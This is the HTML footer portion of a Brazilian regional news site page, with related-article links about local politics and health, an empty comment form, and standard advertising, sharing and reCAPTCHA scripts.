		<a href="http://oiguassu.com/ministro-da-saude-anuncia-construcao-do-novo-hemonucleo/" title="Ministro da Saúde anuncia construção do novo Hemonúcleo"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2017/08/1-17-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2017/08/1-17-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2017/08/1-17-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2017/08/1-17-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2017/08/1-17-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="1448" data-permalink="http://oiguassu.com/ministro-da-saude-anuncia-construcao-do-novo-hemonucleo/1-20/" data-orig-file="http://oiguassu.com/wp-content/uploads/2017/08/1-17.jpg" data-orig-size="549,363" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2017/08/1-17-300x198.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2017/08/1-17.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/ministro-da-saude-anuncia-construcao-do-novo-hemonucleo/" title="Ministro da Saúde anuncia construção do novo Hemonúcleo" rel="bookmark">
			Ministro da Saúde anuncia construção do novo Hemonúcleo		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-7437 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-claudio-eberhard tag-corrupcao tag-foz-do-iguacu tag-gaeco tag-luiz-bendo tag-manchete1 tag-neide-mariot-corrente tag-parana tag-pp tag-psdb tag-santa-terezinha tag-sti">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/santa-terezinha-de-itaipu-operacao-sarue-do-gaeco-prendeu-prefeito-vereador-servidor-publico-e-3-empresarios-vice-deve-assumir-prefeitura/" title="Santa Terezinha de Itaipu: “OPERAÇÃO SARUÊ” DO GAECO PRENDEU PREFEITO, VEREADOR, SERVIDOR PÚBLICO E 3 EMPRESÁRIOS. VICE DEVE ASSUMIR PREFEITURA"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="7443" data-permalink="http://oiguassu.com/santa-terezinha-de-itaipu-operacao-sarue-do-gaeco-prendeu-prefeito-vereador-servidor-publico-e-3-empresarios-vice-deve-assumir-prefeitura/claudio-eberhard/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard.jpg" data-orig-size="1198,645" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Claudio-Eberhard" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-300x162.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/05/Claudio-Eberhard-1024x551.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/santa-terezinha-de-itaipu-operacao-sarue-do-gaeco-prendeu-prefeito-vereador-servidor-publico-e-3-empresarios-vice-deve-assumir-prefeitura/" title="Santa Terezinha de Itaipu: “OPERAÇÃO SARUÊ” DO GAECO PRENDEU PREFEITO, VEREADOR, SERVIDOR PÚBLICO E 3 EMPRESÁRIOS. VICE DEVE ASSUMIR PREFEITURA" rel="bookmark">
			Santa Terezinha de Itaipu: “OPERAÇÃO SARUÊ” DO GAECO PRENDEU PREFEITO, VEREADOR, SERVIDOR PÚBLICO E 3 EMPRESÁRIOS. VICE DEVE ASSUMIR PREFEITURA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "GOVERNO DIZ TER IDENTIFICADO MOVIMENTAÇÃO INCOMUM DE GASTOS DE TEMER"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><div class="gglcptch gglcptch_v2"><div id="gglcptch_recaptcha_396510468" class="gglcptch_recaptcha"></div>
				<noscript>
					<div style="width: 302px;">
						<div style="width: 302px; height: 422px; position: relative;">
							<div style="width: 302px; height: 422px; position: absolute;">
								<iframe src="https://www.google.com/recaptcha/api/fallback?k=6LdS0nQUAAAAAAHCLnx2H4lhvCq8kBPHUe6TV0n1" frameborder="0" scrolling="no" style="width: 302px; height:422px; border-style: none;"></iframe>
							</div>
						</div>
						<div style="border-style: none; bottom: 12px; left: 25px; margin: 0px; padding: 0px; right: 25px; background: #f9f9f9; border: 1px solid #c1c1c1; border-radius: 3px; height: 60px; width: 300px;">
							<textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px !important; height: 40px !important; border: 1px solid #c1c1c1 !important; margin: 10px 25px !important; padding: 0px !important; resize: none !important;"></textarea>
						</div>
					</div>
				</noscript></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='14029' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="d4abbfde3b" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="151"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2019 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

<!-- Infolinks START -->

<script type="text/javascript">
    var infolinks_pid = 3124372; 
    var infolinks_plugin_version = "WP_3.2.3"; 
    var infolinks_resources = "https://resources.infolinks.com/js"; 
</script>
<script type="text/javascript" src="https://resources.infolinks.com/js/infolinks_main.js" ></script>
<!-- Infolinks END -->	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/governo-diz-ter-identificado-movimentacao-incomum-de-gastos-de-temer\/":14029};
	</script>
				<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201901'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Janaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.9'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.8'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' data-cfasync="false" async="async" defer="defer" src='https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=1.38'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var gglcptch = {"options":{"version":"v2","sitekey":"6LdS0nQUAAAAAAHCLnx2H4lhvCq8kBPHUe6TV0n1","theme":"light","error":"<strong>Warning<\/strong>:&nbsp;More than one reCAPTCHA has been found in the current form. Please remove all unnecessary reCAPTCHA fields to make it work properly."},"vars":{"visibility":false}};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/google-captcha/js/script.js?ver=1.38'></script>
<script type='text/javascript' src='https://stats.wp.com/e-201901.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.8',blog:'12891280',post:'14029',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '14029' ]);
</script>
</body>
</html>